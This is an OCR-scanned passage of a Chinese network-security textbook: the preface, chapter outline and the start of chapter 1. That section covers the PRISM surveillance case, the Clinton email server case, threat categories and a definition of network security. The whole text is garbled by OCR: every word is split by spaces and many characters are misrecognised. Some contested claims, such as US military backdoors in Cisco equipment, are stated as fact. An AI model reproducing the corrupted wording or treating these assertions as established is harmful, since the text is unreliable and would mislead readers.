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前 诗 


2014 年 习近平 主席 亲自 担任 中 央 网 络 安 全 和 信息 化 领导 小 组 组 长 ,并 表示 “没有 
网 络 安全 就 没有 国家 安全 ”, 他 强调 :“ 网 络 安全 和 信息 化 是 事 关 国家 安全 和 国家 发 展 、 
事 关 广大 人 民 群 众 工作 生活 的 重大 战略 问题 ,要 从 国际 国内 大 势 出 发 ,总 体 布局 ,统筹 
各 方 , 创 新 发 展 ,努力 把 我 国 建设 成 为 网 络 强国 ,” 这 必 将 给 我 国信 息 安 全 专业 人 才 培 养 
带 来 重大 的 发 展 机 遇 。 

在 信息 社会 中 ,网 络 信息 安全 与 保密 是 一 个 关系 国家 安全 和 主权 、 社 会 的 稳定 、 民 
族 文化 的 继承 和 发 扬 的 重要 问题 。 网 络 信息 安全 与 保密 的 重要 性 有 目 共 睹 ,特别 是 随 
着 全 球 信息 基础 设施 和 各 国信 息 基 础 设施 的 逐渐 形成 , 国 与 国之 间 变 得 “ 近 在 县 尺 ”。 
网 络 化 、 信 息 化 已 成 为 现代 社会 的 一 个 重要 特征 。Internet 一 方面 给 人 类 带 来 很 多 便 
利 , 另 一 方面 也 打开 了 潘多拉 魔 盒 ,使 得 新 的 犯罪 行为 相伴 而 来 。 网 络 信息 系统 中 的 各 
种 犯罪 活动 已 经 严重 地 危害 了 社会 的 发 展 和 国家 的 安全 。 从 技术 角度 看 ,网 络 信息 安 
全 与 保密 涉及 计算 机 技术 .通信 技术 、 密 码 技术 应 用 数学 数论、 信息 论 等 多 门 学 科 。 
因此 ,网 络 安全 的 内 涵 和 外 延 都 极其 丰富 ,试图 在 一 本 教材 中 将 所 有 的 安全 技术 都 阐述 
出 来 是 不 可 能 的 。 

本 书 将 重点 聚焦 在 4 个 问题 上 , 即 : 为 什么 要 研究 网 络 安全 问题 ? 网 络 威胁 有 哪 
些 ? 如 何 从 技术 上 进行 安全 防范 ? 如 何 进行 安全 管理 ? 

本 书 共 分 为 9 章 , 各 章 内 容 如 下 : 

第 1 章 主要 介绍 网 络 安全 的 基础 知识 ,列举 目前 常见 的 计算 机 网 络 安全 的 威胁 ,以 
ISO/OSI 和 TCP/IP 安全 体系 结构 为 模型 ,分析 了 安全 服务 和 实现 机 制 。 第 2 章 介绍 
国内 外 著名 的 黑客 攻击 案例 ,攻击 手法 和 攻击 过 程 ,并 结合 TCP/IP 协议 分 析 其 各 层 所 
存在 的 安全 问题 。 第 3 一 6 章 详细 介绍 网 络 安全 的 各 种 防范 技术 ,通过 身份 认证 决定 访 
问 者 是 否 有 进入 系统 的 钥匙 ; 访问 者 进门 后 通过 访问 控制 来 判断 其 具有 哪些 访问 权 
限 ,防火 墙 如 何 进行 内 外 网 的 隔离 工作 ; 通过 VPN 实现 跨越 公 网 的 安全 传输 ;通过 
IDS 实现 攻击 防御 。 第 7 章 介绍 移动 互联 网 络 的 相关 安全 技术 。 第 8 章 介 绍 物 联网 安 
全 技术 。 第 9 章 介绍 安全 管理 方案 。 

本 书 在 编写 过 程 中 参考 了 大 量 的 国内 外 文献 ,在 此 ,并 向 为 网 络 安全 发 展 作出 贡献 
的 理论 研究 者 和 实践 探索 者 致 以 深 深 的 敬意 。 没 有 你 们 坚持 不 懈 的 努力 ,网 络 安全 肯 
定 无 法 取得 今天 这 样 令 人 鼓舞 的 进展 ,当然 ,本 书 的 成 稿 也 是 不 太 可 能 的 。 

在 本 书 的 编写 过 程 中 ,我 们 得 到 了 众多 同事 和 学 生 的 关心 .支持 和 帮助 . 刘 哲 、 王 立 
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松 、 燕 雪上 峰 等 老师 以 及 胡 峰 、 张 佳 乐 ,成 翔 等 博士 提供 了 大 量 的 资料 ,在 此 一 并 向 他 们 致 以 最 
诚挚 的 谢意 。 

本 书 适 合 供 高 等 院 校 相关 专业 师 生 以 及 其 他 对 网 络 安全 感 兴趣 的 读者 使 用 。 

由 于 网 络 安全 技术 涉及 的 范围 广 , 内 容 多 ,发展 更 新 快 ,加 之 编者 学 识 .资料 和 编写 时 间 
所 限 , 书 中 肯定 有 不 少 下 漏 和 不 妥 之 处 , 敬 请 广大 读者 和 专家 批评 指正 ,有 兴趣 的 读者 可 发 
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第 1 章 网络 安全 基础 


随 着 Internet 的 飞速 发 展 ,各 种 安全 问题 接 呈 而 至 ; 黑客 人 侵 , 病 毒 肆虐 ,网 络 瘫痪 , 主 
页 算 改 …… 各 种 安全 案例 不 胜 枚 举 ,因此 ,如 何 保证 网 络 系统 的 安全 已 成 为 迫在眉睫 的 
问题 。 

本 章 主 要 内 容 : 

。 网 络 安全 案例 

。 计算 机 网 络 安全 的 威胁 

。 计算 机 网 络 安全 的 定义 

。 网 络 安全 模型 结构 





1.1 网 络 安全 案例 


1.1.1 网 络 安全 事件 重点 案例 


1.1.1.1 “棱镜 门 ”事件 

美国 中 央 情 报 局 前 雇员 爱德华 。 斯 诺 登 (图 1.1) 于 2013 年 6 月 公开 了 美国 正在 开展 
的 某 一 秘密 监听 行动 ,该 行动 被 命名 为 “棱镜 ”计划 。 

当 爱 德 华 。 斯 诺 登陆 续 爆 出 美国 在 全 球 范围 内 开 
展 的 监听 监控 及 信息 战 的 各 种 内 幕后 ,世界 各 国 对 美 
国 表示 强烈 遗 责 。 该 事件 的 发 生 不 仅 揭露 了 美国 长 其 
实施 的 信息 侵犯 和 对 各 国 的 监听 监控 ,还 导致 了 诸多 
国家 和 政治 联盟 间 的 紧张 关系 。 世 界 各 国 和 相关 研究 
机 构 对 如 何 保护 网 络 安全 和 隐私 信息 的 讨论 和 研究 随 
之 成 为 热点 。 

爱德华 .斯 诺 登 在 其 披露 内 容 中 指出 : 在 布什 政 图 1.1 爱德华 。 斯 诺 登 
府 执政 时 期 * 楼 镜 计 划 就 已 开始 实施 部 署 。 美 国 诸多 
互联 网 公司 在 美国 情报 部 门 的 指示 下 通过 对 网 络 中 传输 的 各 类 信息 (包括 视频 、 照 片 .电子 
邮件 、 即 时 消息 ,存储 数据 等 ) 进 行 数据 挖掘 ,从 而 达到 分 析 用 户 行为 和 行动 的 目的 。 在 诸多 
监听 内 容 中 包含 两 个 重要 的 监视 项 目 : 其 一 是 监听 世界 各 国 用 户 的 电话 通话 内 容 ; 其 二 是 
监视 各 国 网 民 的 网 络 活动 和 行为 。 

1.“ 棱 镜 ” 计 划 对 中 国 的 监听 

由 于 在 近年 来 大 国 竞争 和 博弈 过 程 中 美国 一 直 视 中 国 为 主要 的 竞争 对 手 ,与 此 同时 两 
国 间 的 相互 依赖 关系 日 益 加 深 并 具有 复杂 性 ,美国 及 其 情报 部 门 自然 十 分 重视 对 中 国 的 监 
听 监 控 工作 , 且 具 有 以 下 特点 。 














1) 监听 时 间 跨 度 大 

早 在 2007 年 美国 情报 机 构 已 将 中 日 、 韩 三 国 视 为 重点 监听 监控 对 象 。 中 国 (包括 港澳 
台地 区 ) 的 数 百 个 计算 机 终端 和 网 络 信息 系统 从 2009 年 起 就 已 被 美国 国家 安全 局 人 侵 并 实 
施 监控 。 监 控 目 标 主要 包括 商 政要 员 及 科研 单位 。 

与 此 同时 , 另 一 数据 表明 ,美国 情报 机 构 在 2011 年 实施 的 200 余 次 网 络 攻击 中 有 近 八 
成 主要 针对 中 国 及 周边 各 国 。 不 仅 如 此 ,美国 某 秘密 机 构 早 在 数 十 年 前 就 已 成 功 渗透 进入 
中 国电 信 系 统 , 其 获取 的 重要 情报 不 仅 数量 庞大 ,而 且 可 靠 性 相当 高 。 

2) 监听 方式 多 样 

美国 作为 目前 全 球 范围 内 掌握 最 先进 信息 技术 的 国家 ,充分 利用 了 多 种 技术 手段 和 庞 
大 的 网 络 优势 对 中 国 采取 多 种 形式 的 监听 监控 。 

首先 ,香港 媒体 从 爱德华 。 斯 诺 登 的 透露 中 获悉 ,美国 情报 部 门 不 仅 成 功 入 侵 中 国电 信 
网 络 并 获取 了 用 户 手机 短信 和 内容, 而 且 对 中 国 项 尖 大 学 的 教育 网 络 和 某 电信 和 运营 商 的 海底 
光缆 都 发 起 过 多 次 攻击 。 

其 次 ,网 络 巨头 思科 公司 作为 美国 军 方 以 及 政府 机 构 主 要 的 通信 设备 及 服务 供应 商 与 
美国 情报 部 门 有 着 千 丝 万 缕 的 联系 。 由 于 以 前 中 国 的 网 络 通信 技术 相对 滞后 ,自主 可 控 的 
网 络 通信 设备 在 技术 上 还 存在 一 定 的 瓶颈 ,所 以 直至 目前 中 国 仍 有 很 多 重点 行业 关键 信息 
系统 的 建设 项 目 不 可 避免 地 有 思科 系列 产品 的 加 入 。 一 旦 中 美 关系 恶化 以 至 于 爆发 战争 ， 
美国 军 方 可 轻松 地 利用 思科 产品 的 技术 后 门 对 中 国 重点 行业 关键 信息 系统 进行 致命 攻击 ， 
其 破坏 力 和 战略 影响 不 可 估量 。 目 前 中 国政 府 已 经 注意 到 这 一 点 ,并 采取 了 一 定 的 措施 。 

不 仅 如 此 ,美国 政府 还 联合 其 各 联盟 国 协同 实施 对 中 国 的 监控 监听 。 有 目前, 中国 连接 亚 
太 地 区 的 光缆 线路 绝 大 多 数 经 过 日 本 。 基 于 这 一 事实 ,日 本 某 媒体 曾 报道 称 美方 在 2011 年 
曾 要 求 日 方 与 其 合作 ,通过 光缆 通信 窃听 协同 部 署 对 经 过 日 方 的 电话 内 容 及 邮件 信息 的 监 
控 监听 项 目 , 其 目的 显然 是 收集 和 窃取 中 国 方面 的 相关 信息 和 情报 。 

3) 监听 程度 较 深 

美国 情报 部 门 不 仅 对 中 国政 府 机 密 信息 进行 监控 ,商业 与 个 人 信息 也 在 其 监控 范围 之 
内 。 其 中 ,中 国 (包括 港澳 台地 区 ) 已 有 数 百 个 目标 成 为 美国 重点 监控 监视 对 象 。 

在 德国 某 周刊 网 站 上 曝光 的 一 份 美国 情报 部 门 “监控 世界 ”的 地 图 上 可 以 明显 地 看 出 ， 
美国 情报 部 门 的 监控 区 域 包含 近 百 个 国家 和 地 区 的 监控 点 ,中 国 已 被 列 为 东亚 地 区 的 首要 
监控 监听 对 象 ,其 中 包括 北京 上海, 成 都 .香港 .台北 等 多 个 监控 点 。 

2.“ 棱 镜 门 ”事件 折射 出 的 网 络 安全 威胁 

纵 观 “棱镜 门 ?事件 ,不 难看 出 ,为 保障 信息 安全 ,防御 的 对 象 已 从 信息 技术 漏洞 .黑客 攻 
击 上 升 为 整个 网 络 空间 安全 防御 。 目 前 对 中 国 网 络 安全 造成 威胁 的 攻击 实体 很 有 可 能 是 有 
组 织 有 预谋 的 组 织 或 机 构 ,甚至 对 方 可 能 是 敌对 国家 的 网 络 作战 部 队 。 因 此 ,对 网 络 空间 威 
胁 进行 系统 的 分 析 梳 理 具有 极为 重要 的 意义 和 紧迫 性 。 从 国家 整体 利益 的 高 度 可 将 目前 主 
要 的 网 络 空 间 威 胁 分 为 以 下 几 个 方面 。 

1) 源 于 国家 层面 的 威胁 

随 着 信息 技术 的 发 展 ,国家 以 及 政治 阵营 间 的 竞争 与 对 抗 已 从 既 有 的 军事 、 经 济 竞争 和 
意识 形态 渗透 延伸 至 网 络 信息 对 抗 与 防御 ,从 而 产生 了 国家 间 的 威慑 与 威胁 。 其 中 最 具 代 
表 性 的 当 属 美国 。 美 国 网 络 空间 安全 体系 中 所 包含 的 中 央 情 报 局 、 国 家 安全 局 和 国土 安全 








第 1 章 网 络 安全 基础 3 





部 扮演 了 网 络 信息 防御 、 渗 透 和 打击 的 核心 角色 。 目 前 ,在 全 球 范围 内 仅 有 美国 提出 了 主动 
进行 网 络 攻击 的 战略 部 署 ,在 其 国家 安全 局 领导 下 的 网 络 作战 部 队 无 论 在 规模 、 防 御 和 攻击 
能 力 还 是 技术 水 平方 面 都 是 其 他 各 国难 以 抗衡 的 。 作 为 全 球 范围 内 最 大 的 情报 组 织 , 美 国 
中 央 情 报 局 在 全 球 诸 多 国家 和 地 区 已 秘密 开展 各 项 渗透 工作 。 

2) 恐怖 组 织 的 威胁 

美国 ”9。11? 恐 怖 克 击 事件 发 生 之 后 , 丽 怖 组 织 以 及 极端 宗教 .民族 分 裂 三 股 势力 发 展 
迅猛 。 这 三 股 势 力 已 开始 利用 网 络 技术 和 手段 进行 各 种 鼓吹 和 发 展 活动 。 不 仅 如 此 ,利用 
网 络 系统 的 漏洞 对 各 国 重点 行业 关键 信息 系统 和 基础 设施 进行 网 络 攻击 已 成 为 近年 来 这 三 
股 势 力 进行 破坏 和 和 恐怖 活动 的 新 型 手段 。 恐 怖 活动 的 网 络 化 不 仅 是 我 国 面临 的 重要 网 络 安 
全 威胁 ,也 已 成 为 全 球 各 国 开展 反 疏 工 作 的 重点 关注 对 象 。 

3) 经 济 犯罪 的 威胁 

随 着 信息 技术 在 金融 服务 中 的 广泛 应 用 ,许多 跨国 犯罪 团伙 和 组 织 利用 普通 民众 网 络 
安全 意识 淡薄 的 特点 预谋 、 策 划 以 及 实施 的 网 络 诈 骗 和 电信 诈骗 案件 一 直 持 续 增 加 。 通 过 
对 国内 破获 的 网 络 诈骗 案件 的 分 析 可 知 金融 服务 系统 的 安全 漏洞 是 犯罪 分 子 寻 找 可 乘 之 机 
的 主要 根源 。 安 全 漏洞 具有 不 可 完全 消除 的 特性 , 随 着 金融 信息 服务 的 日 益 普 及 ,网 络 经 济 
犯罪 的 可 乘 之 机 也 日 益 增 加 ,所 造成 的 危害 和 影响 也 随 之 逐渐 增 大 。 

4) 黑客 团体 的 威胁 

黑客 团体 在 网 络 空间 安全 方面 所 造成 的 威胁 也 已 日 益 增 强 。 他 们 大 多 打 着 反对 全 球 
化 、 参 与 国际 热点 政治 事件 .鼓吹 “无 政府 主义 ”和 宣扬 极端 思潮 的 旗号 在 全 球 范 围 内 进行 网 
络 攻击 。 黑 客 团体 不 仅 对 中 国 的 网 络 安全 造成 了 巨大 威胁 ,对 世界 各 国 所 造成 的 威胁 也 是 
不 容 小 裔 的 。 

5) 极端 个 人 的 威胁 

随 着 “维基 人 解密”“ 校 镜 门 ”等 事件 的 爆发 ,极端 个 人 利用 网 络 技术 挑战 整个 国家 乃至 世 
界 的 趋势 也 日 益 受 到 关注 。 

“棱镜 ”计划 的 曝光 使 得 美国 及 其 联盟 国家 在 全 球 范 围 内 利用 网 络 信息 技术 进行 监控 监 
听 的 事实 浮 出 水 面 。 美 国安 全 部 门 在 该 计划 中 采用 的 多 样 监控 监听 手段 以 及 极为 先进 的 网 
络 信息 技术 令 全 球 各 国 极为 震惊 ,对 网 络 信息 安全 的 警醒 与 反思 随 之 辐射 全 球 。 随 着 网 络 
信息 技术 的 高 速 发 展 ,网 络 安全 显然 已 成 为 国家 安全 的 重要 组 成 部 分 。 

因此 ,我 们 必须 从 “棱镜 门 ”事件 中 深刻 认识 到 该 事件 对 中 国 网 络 安 全 乃至 国家 安全 所 
造成 的 影响 和 巨大 威胁 ,大 力 开展 网 络 安全 建设 与 技术 革新 ,加 快 重点 行业 关键 信息 系统 的 
自主 可 控 化 进程 ,构建 全 方位 多 层次 的 网 络 空 间 安全 体系 。 

1.1.1.2 “邮件 门 "事件 


1.“ 邮 件 门 ”事件 概要 

美国 前 任国 务 镍 希拉 里 。 克林顿 在 处 理 公务 邮件 的 过 程 中 一 直 使 用 在 其 私人 住宅 中 搭 
设 的 私人 邮箱 及 服务 器 ,其 行为 违背 了 美国 政府 对 于 使 用 指定 公务 邮箱 进行 公务 邮件 处 理 
的 规定 。 由 于 希拉 里 的 私人 邮件 服务 器 在 安全 性 方面 存在 漏洞 ,导致 服务 器 被 黑客 非法 登 
和 ,大量 机 密 文件 和 美国 政界 丑闻 被 泄露 ,造成 了 恶劣 的 影响 。 和 希拉 里 所 在 政党 的 敌对 阵营 
共和 党 及 美国 主流 媒体 对 希拉 里 的 行为 表示 强烈 遭 责 。 不 仅 如 此 ,希拉 里 所 使 用 的 私人 邮 
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件 服务 器 被 要 求 在 规定 时 限 内 移交 给 政府 进行 审查 与 评估 。 

美国 政府 对 于 希拉 里 邮件 汇 密 事件 的 高 度 重视 并 非 针 对 希拉 里 个 人 ,美国 政府 一 贯 重 
视 电子 邮件 安全 ,对 于 邮件 信息 泄露 事件 的 调查 早 在 2013 年 就 有 先例 。2013 年 年 底 ,美国 
纽约 南 区 联邦 地 区 法 院 曾 发 布 搜查 令 ,搜查 的 对 象 居然 是 赫赫 有 名 的 微软 公司 。 该 搜查 令 
要 求 微软 公司 向 美国 政府 提交 一 名 电子 邮件 用 户 的 所 有 电子 邮件 内 容 和 相关 账户 信息 。 该 
搜查 令 的 签发 在 全 球 范围 内 引起 了 广泛 热 议 和 讨论 。 欧 美 主流 媒体 以 不 同形 式 对 此 案 进 行 
了 多 次 报道 和 评论 ,评论 的 焦点 主要 集中 在 电子 邮件 内 容 是 否 属于 个 人 私有 财产 ,政府 对 电 
子 邮件 内 容 的 搜查 是 否 属于 侵犯 公民 个 人 私有 财产 的 行为 。 

美国 (隐私 法 ) 早 在 1974 年 就 已 颁布 实施 ,该 项 法 律 不 仅 对 与 公民 个 人 信息 相关 的 各 项 
利益 予以 保护 ,还 强调 了 美国 政府 在 必要 条 件 下 可 以 使 用 公民 个 人 信息 进行 调查 与 执法 。 
1986 年 ,对 于 计算 机 终端 设备 上 所 存储 信息 的 保护 在 (电子 通信 隐私 法 》 子 以 明确 。 为 了 控 
制 垃圾 邮件 的 扩散 与 蔓延 ,美国 政府 又 于 2003 年 出 台 了 《 反 垃圾 邮件 法 》。 在 2014 年 出 台 
的 《联邦 档案 责任 法 案 》 中 明确 规定 非 公 务 电子 邮件 系统 不 得 用 于 政务 人 员 之 间 的 信息 
通信 。 

美国 政府 数 十 年 来 颁布 的 上 述 法 律 法 规 表明 ,美国 政府 非常 重视 作为 常用 通信 手段 的 
电子 邮件 的 安全 性 ,以 至 于 需要 通过 立法 进行 管理 监督 。 在 完善 相关 立法 的 同时 ,美国 政府 
还 通过 推行 多 种 技术 手段 对 电子 邮件 安全 进行 保护 。 例 如 ,美国 政府 在 其 政府 公务 人 员 日 
常 通信 的 邮件 系统 中 增加 了 复杂 的 加 密 算法 ; 美国 众多 电子 邮件 服务 提供 商 ( 如 微软 公司 
和 惠普 公司 ) 都 在 其 邮件 系统 中 架构 了 标识 密码 算法 ,以 保障 邮件 传输 的 安全 性 ; 许多 密码 
学 专家 和 密码 爱好 者 早已 在 网 络 中 共享 发 布 了 许多 用 于 邮件 加 密 的 工具 , 供 民 众 使 用 。 由 
此 可 见 , 电 子 邮 件 安全 在 美国 社会 受到 了 高 度 重视 。 

2. 中 国 针对 邮件 安全 采取 的 措施 


中 国 对 邮件 安全 的 重视 与 管理 这 些 年 来 也 日 益 加 强 , 多 部 门 已 制定 部 署 了 相关 保护 邮 
件 安 全 的 项 目 与 技术 革新 计划 。 国 家 发 改 委 在 2013 年 发 布 的 组 织 实施 信息 安全 专项 的 文 
件 中 指出 :“ 综 合 利用 基于 标识 技术 的 国家 商用 密码 SM9 专用 算法 加 密 , 结 合 国家 信息 安 
全 权威 机 构 定 点 监测 ,建设 安全 邮箱 服务 平台 ,面向 政务 部 门 、 团 体 组 织 和 个 人 提供 可 靠 的 
安全 加 密 邮 件 与 移动 终端 电子 邮件 消息 加 密 推 送 等 运营 服务 。” 

国家 信息 中 心 立项 的 “基于 标识 密码 技术 的 安全 电子 邮箱 试点 示范 ”中 国信 息 安全 测 
评 中 心 立项 的 “基于 公 网 的 跨 域 电 子 邮 箱 安全 保密 试点 示范 "已 列 和 人 2015 年 国家 信息 安全 
专项 名 单 。 上 述 项 目的 立项 和 研究 为 解决 国内 电子 邮件 安全 问题 起 到 了 示范 与 引导 作用 。 

在 加 强 电子 邮件 安全 科研 项 目 立项 研究 的 同时 ,目前 国内 有 关 电 子 邮 件 安全 的 技术 革 
新 与 解决 方案 提升 也 日 益 成 熟 。 由 国家 密码 管理 局 组 织 、 编 写 及 颁布 的 IBC 标识 密码 算法 
及 SM9 密码 算法 在 电子 邮件 安全 领域 已 得 到 了 广泛 应 用 。 与 之 协同 配合 的 电子 邮件 安全 
标准 也 已 由 相关 单位 组 织 撰写 。 只 有 加 紧 研发 推出 新 型 的 安全 技术 手段 应 用 于 电子 邮件 领 
域 , 才 能 使 互联 网 应 用 的 安全 性 和 便捷 性 加 速 融合 。 


1.1.2 网 络 安全 问题 的 提出 


21 世纪 是 信息 的 时 代 。 一 方面 ,信息 技术 高 速 发 展 ,呈现 出 空前 繁荣 的 景象 。 另 一 方 
面 ,危害 网 络 信 息 安 全 与 保密 的 事件 不 断 发 生 , 形 势 异常 严峻 。 网 络 信 息 安 全 是 指 为 数据 处 
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理 系统 而 采取 的 技术 的 和 管理 的 安全 保护 ,保护 计算 机 硬件 、 软 件数 据 不 因 偶然 的 或 恶意 
的 原因 遭 到 破坏 更改 .显露 。 其 中 既 包 含 了 层面 的 概念 ,例如 计算 机 硬件 部 分 可 以 看 作物 
理 层面 ,软件 部 分 可 以 看 作 运行 层面 以 及 数据 层面 ; 又 包含 了 属性 的 概念 ,其 中 破坏 涉及 的 
是 可 用 性 ,更 改 涉及 的 是 完整 性 ,显露 涉及 的 是 机 密 性 。 网 络 信息 安全 与 保密 事 关 国家 安 
全 、 社 会 稳定 和 国家 基础 设施 的 正常 运行 ,因此 必须 采取 措施 确保 网 络 信息 安全 与 保密 。 

为 什么 网 络 安全 问题 如 此 严重 呢 ? 这 是 因为 计算 机 网 络 是 各 种 应 用 系统 的 数据 传输 平 
台 。 上 层 的 各 种 应 用 系统 ,如 电子 商务 应 用 、 电 子 政务 应 用 、 各 种 办 公 系 统 等 ,所 有 的 信息 都 
在 这 个 平台 上 进行 传送 ,应 用 系统 和 各 种 平台 的 层次 关系 可 以 用 图 1. 2 来 表示 。 












































[应用 系统 | 应 用 系统 应 用 系统 

| 数据 库 系 统 平台 | | 数据库 系统 平台 | 。 ”| 数据 库 系统 平台 
| 操作 系统 平台 | | 操作 系统 平台 操作 系统 平台 

G ) 





网 络 通道 
图 1.2 应 用 系统 与 网 络 平台 的 关系 图 


我 们 可 以 将 网 络 平台 看 作 邮 政 系统 ,将 网 络 中 的 各 种 节点 (如 路 由 器 、 交 换 机 等 网 络 设 
备 ) 看 作 进行 各 种 信件 分 拣 投 递 工 作 的 分 拣 机 和 邮递 员 ,而 我 们 自己 就 是 这 个 系统 的 上 层 应 
用 程序 。 一 旦 我 们 到 邮局 寄 出 一 封 信 件 ,邮局 将 根据 地 址 进行 信件 的 分 拣 , 并 运输 到 最 终 客 
户 所 在 的 邮局 ,通过 邮递 员 送 到 最 终 客户 手中 。 这 里 ,我们 寄 出 一 封 邮件 ,相当 于 发 出 一 个 
网 络 分 组 ,信封 上 的 邮寄 地 址 可 以 看 作 网 络 分 组 中 的 目的 IP 地 址 ,落款 可 以 看 作 网 络 分 组 
中 的 源 IP 地 址 。 

在 正常 情况 下 ,邮局 体系 将 正确 无 误 地 进行 传送 ,并 根据 信封 地 址 提交 给 最 终 客 户 。 但 
是 ,如 果 某 个 邮递 员 比 较 粗 心 ,在 投递 过 程 中 遗失 了 信件 ,用 网 络 术 语 来 描述 ,就 是 网 络 分 组 
在 传送 过 程 中 丢失 了 ; 更 有 其 者 , 极 个 别 邮递 员 对 信件 内 容 感 兴趣 ,他 可 能 将 信件 拆 开 看 一 
看 ,这 种 情况 可 以 称 为 “被 动 攻击 ”。 而 且 还 存在 这 种 可 能 性 ,该 邮递 员 是 一 个 写作 高 手 , 对 
请 法 修辞 有 着 深入 的 研究 ,他 觉得 信件 内 容 有 些 请 法 错误 ,于 是 ,他 抑制 不 住 冲动 , 提 笔 对 信 
件 内 容 进 行 了 加 工 修改 。 这 种 情况 就 严重 多 了 ,不管 他 的 初衷 如 何 , 是 否 善意 ,从 安全 角度 
而 言 , 这 种 行为 都 属于 “主动 攻击 ”。 不 管 是 “被 动 攻击 "还 是 “主动 攻击 ,这 两 种 行为 都 对 信 
息 进 行 了 窃听 和 算 改 ,对 网 络 与 信息 安全 造成 了 严重 的 威胁 。 

归纳 而 言 ,网 络 安全 的 具体 内 容 包括 : 

(1) 运行 系统 的 安全 。 主 要 保证 信息 处 理 和 传输 系统 的 安全 。 侧 重 于 保证 系统 正常 地 
运行 ,避免 因为 系统 崩溃 和 损坏 而 对 系统 存储 、 处 理 和 传输 的 信息 造成 破坏 和 损失 。 运 行 系 
统 的 安全 内 容 主 要 包括 计算 机 系统 机 房 环境 的 保护 、 计 算 机 网 络 拓扑 结构 设计 的 安全 性 考 
虑 、 硬 件 系统 的 可 靠 安 全 运行 .计算 机 操作 系统 和 应 用 软件 的 安全 和 数据 库 系统 的 安全 等 内 
容 。 运 行 系统 的 安全 本 质 上 是 保护 系统 的 合法 操作 和 正常 运行 。 

(2) 网 络 上 系统 信息 的 安全 。 包 括 用 户 身份 认证 (一 般 采 用 口令 鉴别 )、 用 户 存 取 信息 
的 权限 控制 ,数据库 记录 访问 权限 、 安 全 审计 (一 般 系 统 都 有 日 志 记 载 ) ,计算 机 病毒 防治 、 数 
据 加 密 等 内 容 。 
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(3) 信息 传播 后 果 的 安全 。 侧 重 于 防止 和 控制 非法 的 \ 有 害 的 信息 传播 ,避免 信息 失 
控 , 本 质 上 主要 是 维护 社会 的 道德 .法律 和 国家 利益 。 


1.2 计算 机 网 络 安全 的 威胁 


各 种 对 计算 机 网 络 安全 形成 的 威胁 可 以 归结 为 以 下 几 类 。 
1. 来 自 内 部 和 外 部 的 各 种 攻击 
计算 机 网 络 极 易 受到 来 自 外 部 或 内 部 的 各 种 攻击 。 攻 击 的 手段 包括 被 动 攻击 和 主动 攻 
击 。 所 谓 被 动 攻击 是 指 侦 听 、 截 获 、 窍 取 、 破 译 、 业 务 流量 分 析 \ 电 磁 信息 提取 等 行为 ,被 动 攻 
击 虽然 不 会 对 信息 进行 修改 ,但 会 造成 信息 内 容 的 泄密 。 而 主动 攻击 是 指 对 网 络 传输 的 信 
息 进行 修改 、 伪 造 . 破 坏 、 冒 充 等 操作 ,或 者 在 网 络 上 进行 病毒 扩散 ,这 种 攻击 将 对 应 用 系统 
的 安全 运行 造成 极 大 的 危害 。 典 型 的 例子 如 冒充 领导 审批 ,签发 文件 等 。 
从 来 源 看 ,攻击 有 来 自 外 部 和 内 部 两 种 : 
。 一 些 黑客 试图 穿 过 边界 防火 墙 进入 内 部 网 络 ,当然 由 于 防火 墙 的 架设 ,这 种 来 自 外 
部 的 攻击 行为 大 部 分 会 被 阻 断 , 只 有 少数 真正 的 高 手 才能 穿越 防火 墙 进入 内 部 
。 绝 大 部 分 攻击 (包括 被 动 攻击 和 主动 攻击 ) 主 要 来 自 内 部 , 且 大 多 采用 被 动 攻击 方 
式 , 即 进行 网 络 窃听 ,了 解 一 些 自己 感 兴趣 而 又 没有 权限 查看 的 内 容 。 更 有 少数 人 
为 达到 某 种 目的 ,对 内 部 各 种 服务 器 进行 主动 攻击 ,由 于 他 们 身 处 防火 墙 内 部 ,而 传 
统 的 边界 防火 墙 是 无 法 防范 内 部 的 各 种 攻击 行为 的 。 因 此 ,内 部 的 主动 攻击 已 经 成 
为 网 络 面临 的 最 大 威胁 之 一 。 
2. 软件 漏洞 
软件 漏洞 主要 表现 为 操作 系统 的 漏洞 和 各 种 应 用 软件 的 漏洞 。 这 些 漏洞 可 能 是 软件 纺 
制 人 员 为 了 调试 方便 预 留 的 ,但 在 软件 正式 发 行 时 却 忘 记 删 除 ,从 而 为 一 些 软件 高 手 或 者 不 
速 之 客 留 下 了 入侵 的 后 门 。 当 然 .也 有 的 漏洞 可 能 是 程序 员 故 意 预 留 的 ,这 种 情况 尤其 值得 
重视 。 因 此 ,在 应 用 系统 最 终 验 收 时 ,尤其 要 重视 安全 性 方面 的 测试 ,防止 出 现 后 门 。 
3. 关键 技术 失控 
目前 常用 的 操作 系统 ,数据库 平台 以 及 应 用 软件 绝 大 部 分 来 自 境外 厂商 ,许多 关键 技术 
并 没有 被 我 国 掌握 ,更 为 糟糕 的 是 这 些 被 广泛 使 用 的 操作 系统 大 多 设 有 "后门 "。 尽 管 正常 
情况 下 这 些 后 门 不 会 被 使 用 ,但 一 旦 出 现 诸如 国家 之 间 的 信息 战 等 紧急 情况 ,黑客 攻击 可 能 
上 升 为 一 种 国家 间 的 战争 。 为 了 各 自 国家 的 利益 ,这 些 境外 厂商 所 在 国家 政府 可 能 强行 要 
求 公开 后 门 , 甚 至 要 求 公开 源码 ,后果 将 不 堪 设 想 。 
4. 安全 管理 水 平 落后 
网 上 新 业务 的 开展 、 传 统 业务 的 开放 式 改造 不断 变 化 的 网 络 应 用 、 网 上 攻击 风险 的 日 
益 增 大 都 对 网 络 系统 的 安全 管理 提出 了 更 高 的 要 求 。 俗 话说 “三 分 技术 ,七 分 管理 ”, 而 恰恰 
是 由 于 管理 跟 不 上 ,制度 不 完善 ,加 上 采用 的 安全 技术 和 产品 是 零散 的 ,导致 许多 网 络 即使 
在 采用 了 先进 技术 ,经 过 安全 配置 ,甚至 在 已 经 使 用 了 一 部 分 专门 的 安全 产品 之 后 ,管理 人 
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员 和 技术 人 员 依 旧 对 自己 网 络 的 安全 性 没有 很 好 地 把 握 。 如 何 有 效 地 提高 网 络 的 安全 性 ， 
保障 网 上 业务 顺利 、 安 全 地 进行 ,将 网 络 的 安全 隐患 降低 到 一 个 可 以 接受 的 程度 ,让 安全 管 
理 人 员 做 到 心中 有 数 , 是 网 络 安全 或 待 解决 的 重要 问题 。 


1.3 计算 机 网 络 安全 的 定义 


网 络 安全 是 指 网 络 系统 的 硬件 .软件 及 其 系统 中 的 数据 受到 保护 ,不 因 偶然 的 或 者 恶意 
的 原因 而 遭 到 破坏 更改, 泄露 。 即 通过 各 种 计算 机 、 网 络 、 密 码 技术 和 信息 安全 技术 ,保护 
